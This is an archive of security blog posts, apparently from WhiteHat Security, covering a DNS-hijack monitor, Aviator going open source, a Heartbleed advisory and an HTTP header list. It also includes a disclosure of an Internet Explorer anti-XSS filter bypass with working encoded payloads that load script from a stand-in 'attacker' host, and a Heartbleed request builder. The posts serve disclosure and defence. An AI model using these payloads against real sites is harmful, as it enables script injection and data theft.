Category Archives: Tools and Applications

#HackerKast 31: RSA San Francisco

We have a special and rare treat this week on HackerKast: Jeremiah, Matt and Robert all together in San Francisco for RSAC. They give a brief overview of some of the interesting conversations and topics they’ve come across.

A recurring topic in conversations with Robert is about how DevOps can improve security and help find vulnerabilities faster. Matt mentions Gauntlt, a cool new project that he contributes to. Gauntlt is a tool that puts security tools into your build-pipeline to test for vulnerabilities before the code goes to production.

Matt also mentions that his buddies at Verizon came out with data showing that people aren’t getting hacked by mobile apps. We haven’t seen large data breaches via mobile apps lead to any financial loss. With the recent surge in mobile use for sensitive data, are these types of data breaches something we should worry about?

On a more pleasant note, Jer was happy to hear that people and companies are realizing the importance of security. Industry leaders are now showing interest in doing application security the right way through a holistic approach.

Also at RSA, Jer talks security guarantees while Matt/Kuskos dive into our Top 10 Web Hacks.

dnstest – Monitor Your DNS for Hijacking

In light of the latest round of DNS attacks and hijackings, it occurred to me that most people really don’t know what to do about them. More importantly, many companies don’t even notice they’ve been attacked until a customer complains. Smaller companies especially, who may have fewer customers or only accept comments through a website, may never know unless they check at random, or until the attacker releases the site and the flood of complaints comes rolling in after the fact.

So I wrote a little tool called “dnstest.pl” (yes a Perl script) that can be run out of cron and can monitor one or more hostname-to-IP-address pairs of sites that are critical to you. If anything happens it’ll send you an alert via email. There are other tools that do this or similar things, but it’s another tool in your arsenal; and most importantly dnstest is meant to be very lightweight and simple to use. You can download dnstest here.
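For a sense of how such a monitor works, here is a minimal Python sketch of the same idea (dnstest itself is a Perl script; the function names, SMTP host, and addresses below are illustrative assumptions, not dnstest’s actual code):

```python
import smtplib
import socket
from email.message import EmailMessage

def check_record(hostname, expected_ip, resolve=socket.gethostbyname):
    """Return None if hostname resolves to expected_ip, else an alert string."""
    try:
        actual = resolve(hostname)
    except OSError as e:
        return f"{hostname}: lookup failed ({e})"
    if actual != expected_ip:
        return f"{hostname}: expected {expected_ip} but got {actual}"
    return None

def monitor(pairs, alert_to, smtp_host="localhost"):
    """Check each (hostname, ip) pair and email any mismatches."""
    problems = [p for p in (check_record(h, ip) for h, ip in pairs) if p]
    if problems:
        msg = EmailMessage()
        msg["Subject"] = "DNS alert: possible hijack"
        msg["To"] = alert_to
        msg["From"] = "dnscheck@localhost"
        msg.set_content("\n".join(problems))
        with smtplib.SMTP(smtp_host) as s:  # assumes a local MTA is listening
            s.send_message(msg)
    return problems
```

Dropped into cron (e.g. `*/5 * * * * /usr/bin/python3 /opt/dnscheck.py`), something like this turns a silent hijack into an email within minutes.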

Of course this is only the first step. Reacting quickly to the alert simply reduces the outage and the chance of customer complaints or similar damage. If you like it but want it to do something else, go ahead and fork it. Enjoy!

Aviator Going Open Source

One of the most frequent criticisms we’ve heard at WhiteHat Security about Aviator is that it’s not open source. There were a great many reasons why we didn’t start off that way, not the least of which was getting the legal framework in place to allow it, but we also didn’t want our efforts to be distracted by external pressures while we were still slaving away to make the product work at all.

But now that we’ve been running for a little more than a year, we’re ready to turn over the reins to the public. We’re open sourcing Aviator to allow experts to audit the code and also to let industrious developers contribute to it. Yes, we are actually open sourcing the code completely, not just from a visibility perspective.

Why do this? I suspect many people just want to be able to look at the code, and don’t have a need – or lack the skills – to contribute to it. But we also received some really compelling questions from people active in the Tor community who expressed an interest in using something based on Chromium, and who also know what a huge pain it is to make something work seamlessly. For them, it would be a lot easier to start with a more secure browser that had already removed a lot of the Google-specific anti-privacy features than to re-invent the wheel. So why not Aviator? Well, after much work with our legal team, the limits of licensing are no longer an issue, so that is now a real possibility. Aviator is now BSD (free as in beer) licensed!

So we hope that people use the browser and make it their own. We won’t be making any additional changes to the browser; Aviator is now entirely community-driven. We’ll still sign the releases, QA them and push them to production, but the code itself will be community-driven. If the community likes Aviator, it will thrive, and now that we have a critical mass of technical users and people who love it, it should be possible for it to survive on its own without much input from WhiteHat.

As an aside, many commercial organizations discontinue support of their products, but they regularly fail to take the step of open sourcing them. This is how Windows XP dies a slow death in so many enterprises, unpatched, unsupported and dangerously vulnerable. This is how MMORPG video games die or become completely unplayable once the servers are dismantled. We also see SaaS companies discontinue services and allow only a few weeks or months for mass migrations without any easy alternatives in sight. I understand the financial motives behind planned obsolescence, but it’s bad for the ecosystem and bad for the users. This is something the EFF is working to resolve and something I personally feel that all commercial enterprises should do for their users.

If you have any questions or concerns about Aviator, we’d love to hear from you. Hopefully this is the browser “dream come true” that so many people have been asking for, for so long. Thank you all for supporting the project and we hope you have fun with the code. Aviator’s source code can be found here on Github. You don’t need anything to check it out. If you want to commit to it, shoot me an email with your github account name and we’ll hook you up. Go forth! Aviator is yours!

Security Guaranteed: Customers Deserve Nothing Less

WhiteHat Security Sentinel Elite

Ever notice how everything in the information security industry is sold “as is”? No guarantees, no warranties, no return policies. This provides little peace of mind that any of the billions that are spent every year on security products and services will deliver as advertised. In other words, there is no way of ensuring that what customers purchase truly protects them from getting hacked, breached, or defrauded. And when these security products fail – and I do mean when – customers are left to deal with the mess on their own, letting the vendors completely off the hook. This does not seem fair to me, so I can only imagine how a customer might feel in such a case. What’s worse, any time someone mentions the idea of a security guarantee or warranty, the standard retort is “perfect security is impossible,” “we provide defense-in-depth,” or some other dismissive and ultimately unaccountable response.

Still, the naysayers have a valid point. Given enough time and energy, everything can be hacked, including security products, but this admission does not inspire much confidence in those who buy our warez and whose only fear is getting hacked. We, as an industry, are not doing anything to alleviate that fear. With something as important as information security is today, I personally think customers deserve more assurance. I believe customers should demand accountability from their vendors in particular. I believe the “as is” culture in security is something the industry must move away from. Why? Because if it were incumbent upon vendors to stand by their products, we would start to see more pushback against the status quo and, perhaps, even renewed innovation.

At the core of the issue is bridging the gap between the “nothing-is-perfect” mindset and the business requirements for providing security guarantees.

If you think about it, many other industries already offer guarantees, warranties, or 100% return policies for less than perfect products. Examples include electronics, clothing, cars, lawn care equipment, and basically anything you buy on Amazon. As we know, all these items have defect rates, yet it doesn’t appear to prevent those sellers from standing behind their products. Perhaps the difference is, unlike most security vendors, these merchants know their product failure rates and replacement costs. This business insight is precisely why they’re willing to reimburse their customers accordingly. Security vendors by contrast tend NOT to know their failure rates, and if they do, the rates are likely horrible (anti-virus is a perfect example of this). As such, vendors are unwilling to put their money where their mouth is, the “as is” culture remains, and interests between security vendor and customer are misaligned.

The key then, is knowing the security performance metrics and failure rates (i.e. having enough data on how the bad guys broke in and why the security controls failed) of the products. With this information in hand, offering a security guarantee is not only possible, but essential!

WhiteHat Security is in a unique position to lead the charge away from selling “as is” and towards security guarantees. We can do this, because we have the data and metrics to prove our performance. Other Software-as-a-Service vendors could theoretically do the same, and we encourage them to consider doing so.

For example, at WhiteHat we help our customers protect their websites from getting hacked by identifying vulnerabilities and helping to get them fixed before they’re exploited. If the bad guys are then unable to find and exploit a vulnerability we missed, or if they decide to move on to easier targets, that’s success! Failure, on the other hand, is missing a vulnerability we should have found which results in the website getting hacked. This metric – the product failure rate – is something any self-respecting vulnerability assessment vendor should track very closely. We do, and here’s how we bring it all together:

  1. WhiteHat’s Sentinel scanning platform and the 100+ person army of Web security experts behind it in our Threat Research Center (TRC) tests tens of thousands of websites on a 24x7x365 basis. We’ve been doing this for more than a decade and we have a larger and more accurate website vulnerability data set than anyone else. We know with a fine degree of accuracy what vulnerabilities we are able to identify – and which ones we are not.
  2. We also have data sharing relationships with Verizon (and others) on the incident side of the equation. This is to say we have good visibility into what attack techniques the bad guys are trying and what they’re likely to successfully exploit. This insight helps us focus R&D resources towards the vulnerabilities that matter most.
  3. We also have great working relationships with our customers so that when something unfortunate does occur – which can be anything from something as simple as a ‘missed’ vulnerability, to a site that was no longer being scanned by our solution that contained a vulnerability, all the way to a real breach – we’re in the loop. This is how we can determine whether something we missed and should have found actually results in a breach.

Bottom line: in the past 10+ years of performing countless assessments and identifying millions of vulnerabilities, there have been only a small number of instances in which we missed a vulnerability that we should have found and that we know was likely used to cause material harm to a customer. All told, our failure rate is far below one percent (<0.01%) – an impressive track record, and one that we are quite proud of. I am not familiar with any other software scanning vendor who even claims to know what their failure rate metric is, let alone has the confidence to publicly talk about it. And it is for this reason that we can confidently stand behind our own security guarantee for customers with the new Sentinel Elite.

Introducing: Sentinel Elite

Sentinel Elite is a brand new service line from WhiteHat in which we deploy our best and most comprehensive website vulnerability assessment processes. Sentinel Elite builds on the proven security of WhiteHat Sentinel, which offers the lowest false-positive rate of any web application security solution available as well as more than 10 years of website vulnerability assessment experience. This service, combined with a one-of-a-kind security guarantee from WhiteHat, gives customers confidence both in their purchase decision and in the integrity of their websites and data.

Sentinel Elite customers will have access to a dedicated subject matter expert (SME) who expedites communication and response times, as well as coordinates the internal and external activities supporting your application security program. The SME will also supply prioritized guidance support, so customers know which vulnerabilities to fix first… or not! Customers also receive access to the WhiteHat Limited Platinum Support program, which includes a one-hour SLA, quarterly summaries and exploit reviews, as well as a direct line to our TRC. Sentinel Elite customers must in turn provide us with what we need to do our work, such as giving us valid website credentials and taking action to remediate identified vulnerabilities. Provided everyone does what they are responsible for, our customers can rest assured that their website and critical applications will not be breached. And we are prepared to stand behind that claim.

If it happens that a website covered by Sentinel Elite gets hacked, specifically using a vulnerability we missed and should have found, the customer will be refunded in full. It’s that simple.

We know there will be those in the community who will be skeptical. That’s the nature of our industry and we understand the skepticism. In the past, other security vendors have offered half-hearted or gimmicky guarantees, but that’s not what we’re doing here. We’re serious about web security, we always have been. We envision an industry where outcomes and results matter, a future where all security products come with security guarantees, and most importantly, a future where the vendors’ best interests are in line with their customers’ best interests. How amazing would that be not only for customers but also for the Internet and the world we live, work and do business in? Sentinel Elite is the first of many steps we are taking to make this a reality.

For more information about Sentinel Elite, please click here.

WhiteHat Security Observations and Advice about the Heartbleed OpenSSL Exploit

The Heartbleed SSL attack is one of the most significant, and media-covered, vulnerabilities affecting the Internet in recent years. According to Netcraft, 17.5% of SSL-enabled sites on the Internet were vulnerable to the Heartbleed SSL attack just prior to its disclosure.

The vulnerable versions of OpenSSL were first released to the public 2 years ago. The implications of 2 years of exposure to this vulnerability are significant, and we will explore that more at the end of this article. First – immediate details:

This attack does not require any MitM (Man in the Middle) or other complex setups that SSL exploits usually require. This attack can be executed directly and anonymously against any webserver/device running a vulnerable version of OpenSSL, and yield a wealth of sensitive information.
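For context, the bug (CVE-2014-0160) lies in the TLS heartbeat extension: the attacker sends a heartbeat request whose claimed payload length is larger than the payload actually sent, and a vulnerable server echoes back that many bytes of adjacent process memory. A byte-layout sketch in Python (illustrative only, not a complete exploit; the constants follow the TLS 1.1 record format):

```python
import struct

def build_malicious_heartbeat(claimed_len=0x4000):
    """Build a TLS heartbeat request that claims a large payload but
    carries none; a vulnerable server echoes back up to claimed_len
    bytes of whatever happens to sit in its memory."""
    # TLS record header: content type 0x18 (heartbeat), version 3.2
    # (TLS 1.1), record length 3 (just the heartbeat header below).
    record = struct.pack(">BHH", 0x18, 0x0302, 3)
    # Heartbeat message: type 1 (request), claimed payload length,
    # and then... no payload at all. The length lie is the bug.
    heartbeat = struct.pack(">BH", 0x01, claimed_len)
    return record + heartbeat
```

Sent over an established TLS connection, this 8-byte message is all it takes; a patched server validates the length field and stays silent, while a vulnerable one responds with up to 64 KB of memory per request.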

WhiteHat Security’s Threat Research Center (TRC) began testing customers for vulnerability to this attack immediately, using a custom SSL-testing tool from our TRC R&D labs. Our initial conclusions were that the frequency with which sites were vulnerable to this attack was low on production applications being monitored by the WhiteHat Sentinel security service. In our first test sample, covering 18,000 applications, we found a vulnerability rate of about 2% – much lower than Netcraft’s 17.5% vulnerability rate for all SSL-enabled websites. This may be the result of a biased sample, since we only evaluated applications under Sentinel service; application owners who use Sentinel are likely already more security-conscious than most.

While the frequency of vulnerability to the Heartbleed SSL attack is low, those sites that are vulnerable are severely vulnerable. Everything in memory on the webserver/device running a vulnerable version of OpenSSL is exposed. This includes:

  • UserIDs
  • Passwords
  • PII (Personally Identifiable Information)
  • SSL certificate private keys (e.g., SSL traffic using this cert will never be private again if the key is compromised)
  • Any private crypto keys
  • SSL-based Chat
  • SSL-based VPN
  • SSL-based anything
  • Connection Strings (Database userIDs/Passwords) to back-end databases, mainframes, LDAP, partner systems, etc. loaded in memory
  • Additional vulnerabilities in source code that are loaded into memory, with precise locations (e.g., blind SQL injection)
  • Basically any code or data in memory on the server running a vulnerable version of OpenSSL is rendered in clear-text to all attackers

The most important thing you need to know regarding the above: this attack leaves no traces. No logs. Nothing suspect. It is a nice, friendly, read-only anonymous dump of memory. This is the digital equivalent of accidentally leaving a copy of your corporate diary, with all sorts of private secrets, on the seat of the mass-transit bus for everyone to read – including strangers you will never know. Your only recourse for secrets like passwords now is the delete key.

The list of vulnerable applications published to date includes mainstream web and mobile applications, security devices with web interfaces, and critical business applications handling sensitive and federally-regulated data.

This is a seriously sub-optimal situation.

Timeline of the Heartbleed SSL attack and WhiteHat Security’s response:

April 7th: Heartbleed 0day attack published. Websites vulnerable to the attack included major websites/email services that the majority of the Internet uses daily, and many mobile applications that use OpenSSL.

April 8th: WhiteHat TRC begins testing customers’ sites for vulnerability to Heartbleed SSL exploitation. In parallel, WhiteHat R&D begins QAing new automated tests to enable Sentinel services to identify this vulnerability at scale.

April 9th: WhiteHat TRC identifies roughly 350 websites vulnerable to the Heartbleed SSL attack, out of an initial sample of 18,000 production applications – an initial average vulnerability rate of 1.9%, a percentage that drops rapidly over the following 48 hours.

April 10th: WhiteHat R&D releases new Sentinel Heartbleed SSL vulnerability tests, enabling Sentinel to automatically identify if any applications under Sentinel service are vulnerable to Heartbleed SSL attacks with every scan. This brings test coverage to over 35,000 applications. Average vulnerability rate drops to below 1% by EOD April 10th.

Analysis: the more applications we scan using the new Heartbleed SSL attack tests, the fewer sites (by percent) we find vulnerable to this attack. We suspect this is because most customers have moved quickly to patch this vulnerability, due to the extreme severity of the vulnerability and the intense media coverage of the issue.

Speculation: we suspect that this issue will quickly disappear for most important SSL-enabled applications on the Internet – especially applications under some type of active DAST or SAST scanning service. It will likely linger on with small sites hosted by providers that do not offer (or pay attention to) any form of security patching service.

We also expect this issue to persist with internal (non-Internet-facing) applications and devices that use SSL, but which are commonly not tested or monitored by tools or services capable of detecting this vulnerability, and that are less frequently upgraded.

While the attack surface of internal network applications & devices may appear to be much smaller than that of Internet-facing applications, simple one-click exploits are already available on the Internet, usable by anyone on your network with access to a web browser. (link to exploit code: http://samiux.blogspot.com/2014/04/exploit-dev-heartbleed-cve-2014-0160.html)

This means that any internal user on your network who downloads one of these exploits is capable of extracting everything in memory from any device or application on your internal network that is vulnerable. This includes:

  • Internal routers and switches
  • Firewalls and IDS systems
  • Human Resources applications
  • Finance and payroll applications
  • Pretty much any application or device running a vulnerable version of OpenSSL
  • Agents exploiting internal devices will see all network traffic or application data in memory on the affected device/application

Because most of these internal applications and devices lack the type of logging and alerting that would notify Information Security teams of active abuse of this vulnerability, our concern is that in the coming months these internal devices and applications may provide rich grounds for exploitation that may never be discovered.

Conclusion & Recommendations:
The scope, impact, and ease-of-exploitation of this vulnerability make it one of the worst in Internet history. However, patches are readily available for most systems, and the risk of applying them appears minimal. It appears most of our customers have already patched the majority of their Internet-facing systems against this exploit.

However, this vulnerability has existed for up to 2 years in OpenSSL implementations. We will likely never know if anyone has been actively exploiting this vulnerability, due to the difficulty in logging/tracking attacks. If your organization is concerned about this, we recommend that — in addition to patching this vulnerability — SSL certificates of suspect systems be revoked and re-issued. We also recommend that all end-user passwords and system passwords be changed on suspect systems.

Is this vulnerability a “boy that cried wolf” hype situation? Bruce Schneier has another interesting perspective on this: https://www.schneier.com/blog/archives/2014/04/heartbleed.html.

WhiteHat will continue to share more information about this vulnerability as further information becomes available.

General reference material:
https://blog.whitehatsec.com/heartbleed-openssl-vulnerability/
https://www.schneier.com/blog/archives/2014/04/heartbleed.html

Vulnerability details:
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0160
https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-0160

Exploit details:
http://samiux.blogspot.com/2014/04/exploit-dev-heartbleed-cve-2014-0160.html

Summaries:
http://business.kaspersky.com/the-heart-is-bleeding-out-a-new-critical-bug-found-in-openssl/
http://news.netcraft.com/archives/2014/04/08/half-a-million-widely-trusted-websites-vulnerable-to-heartbleed-bug.html

Adding Open Source Framework Hardening to Your SDLC – Podcast

I talk with G.S. McNamara, Federal Information Security Senior Consultant, about fixing open source framework vulnerabilities, what to consider when pushing open source, how to implement a system around patches without impacting performance, and security considerations on framework selections.

Want to do a podcast with us? Signup to be part of our Unsung Hero program.

About our “Unsung Hero Program”
Every day app sec professionals tirelessly protect the Web, and we recognize that this is largely owed to a series of small victories. These represent untold stories. We want to help share your story. To learn more click here.

List of HTTP Response Headers

Every few months I find myself looking up the syntax of a relatively obscure HTTP header, and wondering why there isn’t a good definitive list of common HTTP response headers anywhere. The lists on the Internet are usually missing half a dozen HTTP headers. So I’ve taken care to gather a list of all the HTTP response headers I could find. Hopefully this is useful to you, and removes some of the mystique behind how HTTP works if you’ve never seen headers before.

Note: this does not include things like IncapIP or other proxy/service specific headers that aren’t standard, and nor does it include request headers.

Header: Example Value (Notes)
Access-Control-Allow-Credentials: true
Access-Control-Allow-Headers: X-PINGOTHER
Access-Control-Allow-Methods: PUT, DELETE, XMODIFY
Access-Control-Allow-Origin: http://example.org
Access-Control-Expose-Headers: X-My-Custom-Header, X-Another-Custom-Header
Access-Control-Max-Age: 2520
Accept-Ranges: bytes
Age: 12
Allow: GET, HEAD, POST, OPTIONS (commonly includes other methods, like PROPFIND etc…)
Alternate-Protocol: 443:npn-spdy/2,443:npn-spdy/2
Cache-Control: private, no-cache, must-revalidate
Client-Date: Tue, 27 Jan 2009 18:17:30 GMT
Client-Peer: 123.123.123.123:80
Client-Response-Num: 1
Connection: Keep-Alive
Content-Disposition: attachment; filename="example.exe"
Content-Encoding: gzip
Content-Language: en
Content-Length: 1329
Content-Location: /index.htm
Content-MD5: Q2hlY2sgSW50ZWdyaXR5IQ==
Content-Range: bytes 21010-47021/47022
Content-Security-Policy, X-Content-Security-Policy, X-WebKit-CSP: default-src 'self' (a different header name is needed to control each browser family)
Content-Security-Policy-Report-Only: default-src 'self'; …; report-uri /csp_report_parser;
Content-Type: text/html (can also include charset information, e.g. text/html;charset=ISO-8859-1)
Date: Fri, 22 Jan 2010 04:00:00 GMT
ETag: "737060cd8c284d8af7ad3082f209582d"
Expires: Mon, 26 Jul 1997 05:00:00 GMT
HTTP/1.1 401 Unauthorized (the status line; a special case with no colon-space delimiter)
Keep-Alive: timeout=3, max=87
Last-Modified: Tue, 15 Nov 1994 12:45:26 GMT
Link: <http://www.example.com/>; rel="canonical" (other rel values include "alternate")
Location: http://www.example.com/
P3P: policyref="http://www.example.com/w3c/p3p.xml", CP="NOI DSP COR ADMa OUR NOR STA"
Pragma: no-cache
Proxy-Authenticate: Basic
Proxy-Connection: Keep-Alive
Refresh: 5; url=http://www.example.com/
Retry-After: 120
Server: Apache
Set-Cookie: test=1; domain=example.com; path=/; expires=Tue, 01-Oct-2013 19:16:48 GMT (can also include the Secure and HttpOnly flags)
Status: 200 OK
Strict-Transport-Security: max-age=16070400; includeSubDomains
Timing-Allow-Origin: www.example.com
Trailer: Max-Forwards
Transfer-Encoding: chunked (other values: compress, deflate, gzip, identity)
Upgrade: HTTP/2.0, SHTTP/1.3, IRC/6.9, RTA/x11
Vary: *
Via: 1.0 fred, 1.1 example.com (Apache/1.1)
Warning: 199 Miscellaneous warning
WWW-Authenticate: Basic
X-Aspnet-Version: 2.0.50727
X-Content-Type-Options: nosniff
X-Frame-Options: deny
X-Permitted-Cross-Domain-Policies: master-only (used by Adobe Flash)
X-Pingback: http://www.example.com/pingback/xmlrpc
X-Powered-By: PHP/5.4.0
X-Robots-Tag: noindex,nofollow
X-UA-Compatible: Chrome=1
X-XSS-Protection: 1; mode=block
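Every one of these headers arrives as a simple “Name: value” line after the status line. A small Python sketch (the function name is mine) that splits a raw response into its status line, header map, and body, which can be handy when eyeballing unfamiliar headers:

```python
def parse_response_headers(raw):
    """Split a raw HTTP response string into (status line, headers dict, body)."""
    head, _, body = raw.partition("\r\n\r\n")   # headers end at the blank line
    lines = head.split("\r\n")
    status = lines[0]                           # e.g. "HTTP/1.1 200 OK" - no colon
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip()] = value.strip()
    return status, headers, body

raw = ("HTTP/1.1 200 OK\r\n"
       "Content-Type: text/html;charset=ISO-8859-1\r\n"
       "X-Frame-Options: deny\r\n"
       "\r\n"
       "<html></html>")
status, headers, body = parse_response_headers(raw)
```

(A real client would also need to handle folded and repeated headers; this sketch keeps only the last occurrence of a repeated name.)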

If I’ve missed any response headers, please let us know by leaving a comment and I’ll add it into the list. Perhaps at some point I’ll create a similar list for Request headers, if people find this helpful enough.

Bypassing Internet Explorer’s Anti-Cross Site Scripting Filter

There’s a problem with the reflective Cross Site Scripting ("XSS") filter in Microsoft’s Internet Explorer family of browsers that extends from version 8.0 (where the filter first debuted) through the most current version, 11.0, released in mid-October for Windows 8.1, and early November for Windows 7.

In the simplest possible terms, the problem is that the anti-XSS filter only compares the untrusted request from the user and the response body from the website for reflections that could cause immediate JavaScript or VBScript code execution. Should an injection from that initial request reflect on the page but not cause immediate JavaScript code execution, the untrusted data from the injection is then marked as trusted data, and the anti-XSS filter will not check it in future requests.

To reiterate: Internet Explorer’s anti-XSS filter divides the data it sees into two categories: untrusted and trusted. Untrusted data is subject to the anti-XSS filter, while trusted data is not.

As an example, let’s suppose a website contains an iframe definition where an injection on the "xss" parameter reflects in the src="" attribute. The page referenced in the src="" attribute contains an XSS vulnerability such that:

GET http://vulnerable-iframe/inject?xss=%3Ctest-injection%3E

results in the “xss” parameter being reflected in the page containing the iframe as:

<iframe src="http://vulnerable-page/?vulnparam=<test-injection>"></iframe>

and the vulnerable page would then render as:

Some text <test-injection> some more text

Should a user make a request directly to the vulnerable page in an attempt to reflect <script src=http://attacker/evil.js></script> as follows:

GET http://vulnerable-page/?vulnparam=%3Cscript%20src%3Dhttp%3A%2F%2Fattacker%2Fevil%2Ejs%3E%3C%2Fscript%3E

Internet Explorer’s anti-XSS filter sees that the injection would result in immediate JavaScript code execution and subsequently modifies the response body to prevent that from occurring.

Even when the request is made to the page containing the iframe as follows:

GET http://vulnerable-iframe/inject?xss=%3Cscript%20src%3Dhttp%3A%2F%2Fattacker%2Fevil%2Ejs%3E%3C%2Fscript%3E

and Internet Explorer’s anti-XSS filter sees it reflected as:

<iframe src="http://vulnerable-page/?vulnparam=<script src=http://attacker/evil.js></script>"></iframe>

which, because it looks like it might cause immediate JavaScript code execution, will also be altered.

To get around the anti-XSS filter in Internet Explorer, an attacker can make use of sections of the HTML standard: Decimal encodings and Hexadecimal encodings.

Hexadecimal encodings were made part of the official HTML standard in 1998 as part of HTML 4.0 (3.2.3: Character references), while Decimal encodings go back further to the first official HTML standard in HTML 2.0 in 1995 (ISO Latin 1 Character Set). When a browser sees a properly encoded decimal or hexadecimal character in the response body of a HTTP request, the browser will automatically decode and display for the user the character referenced by the encoding.

As an added bonus for an attacker, when a decimal or hexadecimal encoded character is returned in an attribute that is then included in a subsequent request, it is the decoded character that is sent, not the decimal or hexadecimal encoding of that character.

Thus, all an attacker needs to do is fool Internet Explorer’s anti-XSS filter by inducing some of the desired characters to be reflected as their decimal or hexadecimal encodings in an attribute.
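The partial-encoding trick is easy to script: replace a chosen subset of the payload’s characters with their decimal (&#NN;) or hexadecimal (&#xNN;) character references, then URL-encode the result for use in the query string. A small illustrative Python helper (function and variable names are mine, not from the original research):

```python
from urllib.parse import quote

def partial_encode(payload, chars, hexmode=False):
    """Replace selected characters with HTML decimal or hexadecimal
    character references so the reflected markup no longer matches the
    executable-looking pattern the filter scans for."""
    out = []
    for ch in payload:
        if ch in chars:
            out.append(f"&#x{ord(ch):x};" if hexmode else f"&#{ord(ch)};")
        else:
            out.append(ch)
    return "".join(out)

payload = "<script src=http://attacker/evil.js></script>"
# Encode just enough characters to break the filter's pattern match
reflected = partial_encode(payload, "cr")
url_param = quote(reflected, safe="")
```

Note that `quote` turns a reference like `&#99;` into `%26%2399%3B`, which is exactly the shape these injections take once URL-encoded into the query string.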

To return to the iframe example, instead of the obviously malicious injection, a slightly modified injection will be used:

Partial Decimal Encoding:
GET http://vulnerable-iframe/inject?xss=%3Cs%26%2399%3B%26%23114%3Bi%26%23112%3Bt%20s%26%23114%3B%26%2399%3B%3Dht%26%23116%3Bp%3A%2F%2Fa%26%23116%3Bta%26%2399%3Bker%2Fevil%2Ejs%3E%3C%2Fs%26%2399%3B%26%23114%3Bi%26%23112%3Bt%3E

which reflects as:

<iframe src="http://vulnerable-page/?vulnparam=<s&#99;&#114;i&#112;t s&#114;&#99;=ht&#116;p://a&#116;ta&#99;ker/evil.js></s&#99;&#114;i&#112;t>"></iframe>

or

Partial Hexadecimal Encoding:
GET http://vulnerable-iframe/inject?xss=%3Cs%26%23x63%3Bri%26%23x70%3Bt%20s%26%23x72%3Bc%3Dhttp%3A%2F%2Fatta%26%23x63%3Bker%2Fevil%2Ejs%3E%3C%2Fs%26%23x63%3Bri%26%23x70%3Bt%3E

which reflects as:

<iframe src="http://vulnerable-page/?vulnparam=<s&#x63;ri&#x70;t s&#x72;c=http://atta&#x63;ker/evil.js></s&#x63;ri&#x70;t>"></iframe>

Internet Explorer’s anti-XSS filter does not see either of those injections as potentially malicious, and the reflections of the untrusted data in the initial request are marked as trusted data and will not be subject to future filtering.

The browser, however, sees those injections, and will decode them before including them in the automatically generated request for the vulnerable page. So when the following request is made from the iframe definition:

GET http://vulnerable-page/?vulnparam=%3Cscript%20src%3Dhttp%3A%2F%2Fattacker%2Fevil%2Ejs%3E%3C%2Fscript%3E

Internet Explorer’s anti-XSS filter will ignore the request completely, allowing it to reflect on the vulnerable page as:

Some text <script src=http://attacker/evil.js></script> some more text
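The decoding step at the heart of this relay can be illustrated with a short Python sketch (purely illustrative, using only the standard library): `html.unescape` performs the same character-reference decoding that the browser applies to attribute values before reusing them in a request.

```python
from html import unescape

# The partially encoded payload as it sits in the iframe's src attribute
# (from the example above): selected characters are decimal entities.
reflected_attr = (
    "<s&#99;&#114;i&#112;t s&#114;&#99;=ht&#116;p://a&#116;ta&#99;ker"
    "/evil.js></s&#99;&#114;i&#112;t>"
)

# The browser decodes character references in attribute values, so the
# automatically generated follow-up request carries the decoded payload:
print(unescape(reflected_attr))
# -> <script src=http://attacker/evil.js></script>
```

Because the decoding happens in the browser, after the anti-XSS filter has already inspected (and trusted) the first reflection, the filter never sees the reassembled script tag.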

Unfortunately (or fortunately, depending on your point of view), this methodology is not limited to iframes. Any place where an injection lands in the attribute space of an HTML element, which is then relayed onto a vulnerable page on the same domain, can be used. Form submissions where the injection reflects either inside the "action" attribute of the form element or in the "value" attribute of an input element are two other instances that may be used in the same manner as with the iframe example above.

Beyond that, in cases where there is only the single page where:

GET http://vulnerable-page/?xss=%3Ctest-injection%3E

reflects as:

Some text <test-injection> some more text

the often under-appreciated sibling of Cross Site Scripting, Content Spoofing, can be utilized to perform the same attack. In this example, an attacker would craft a link that would reflect on the page as:

Some text <div style=some-css-elements><a href=?xss=&#x3C;s&#x63;ri&#x70;t&#x20;s&#x72;c&#x3D;htt&#x70;://atta&#x63;ker/evil.js&#x3E;&#x3C;/s&#x63;ri&#x70;t&#x3E;>Requested page has moved here</a></div> some more text

Then when the victim clicks the link, the same page is called, but now with the injection being fully decoded:

Some text <script src=http://attacker/evil.js></script> some more text

This is the flaw in Internet Explorer’s anti-XSS filter. It only looks for injections that might immediately result in JavaScript code execution. Should an attacker find a way to relay the injection within the same domain — be it by frames/iframes, form submissions, embedded links, or some other method — the untrusted data injected in the initial request will be treated as trusted data in subsequent requests, completely bypassing Internet Explorer’s anti-Cross Site Scripting filter.

Afterword:

After Microsoft made its decision not to work on a fix for this issue, it was requested that the following link to their design philosophy blog post be included in any public disclosures that may occur. In particular the third category, which discusses "application-specific transformations" and the possibility of an application that would "ROT13 decode" values before reflecting them, was pointed to in Microsoft’s decision to allow this flaw to continue to exist.

http://blogs.msdn.com/b/dross/archive/2008/07/03/ie8-xss-filter-design-philosophy-in-depth.aspx

The "ROT13 decode" and "application-specific transformations" mentions do not apply. Everything noted above is part of the official HTML standard, and has been so since at least 1998 — if not earlier. There is no "only appears in this one type of application" functionality being used. The XSS injection reflects in the attribute space of an element and is then relayed onto a vulnerable page (either another page, or back to itself) where it then executes.

Additionally, the use of decimal and hexadecimal encodings is not the flaw; they are merely two implementations of the method that exploits the flaw. Often simple URL/URI encodings (mentioned as early as 1994 in RFC 1630) can be used in their place.
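To illustrate that last point (a hedged sketch, standard library only): plain percent-decoding of an ordinary URL-encoded parameter yields exactly the same payload, with no exotic transformation involved.

```python
from urllib.parse import unquote

# An ordinary URL-encoded query value, as any server framework would
# receive and decode it (RFC 1630-era percent-encoding):
encoded = "%3Cscript%20src%3Dhttp%3A%2F%2Fattacker%2Fevil%2Ejs%3E%3C%2Fscript%3E"

print(unquote(encoded))
# -> <script src=http://attacker/evil.js></script>
```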

The flaw with Internet Explorer’s anti-XSS filter is that injected untrusted data can be turned into trusted data and that injected trusted data is not subject to validation by Internet Explorer’s anti-XSS filter.

Post Script:

The author has adapted this post from his original work, which can be found here:

http://rtwaysea.net/blog/blog-2013-10-18-long.html

Announcing Support for PHP in WhiteHat Sentinel Source

It is with great pleasure that I formally announce support for the PHP programming language in WhiteHat Sentinel Source! Joining Java and C#, PHP is now a member of the family of languages supported by our static code analysis technology. Effective immediately, our users can schedule static analysis scans of web applications developed in PHP for security vulnerabilities. Accurately and efficiently supporting the PHP language was a tremendous engineering effort, and a great reflection on our Engine and Research and Development teams.

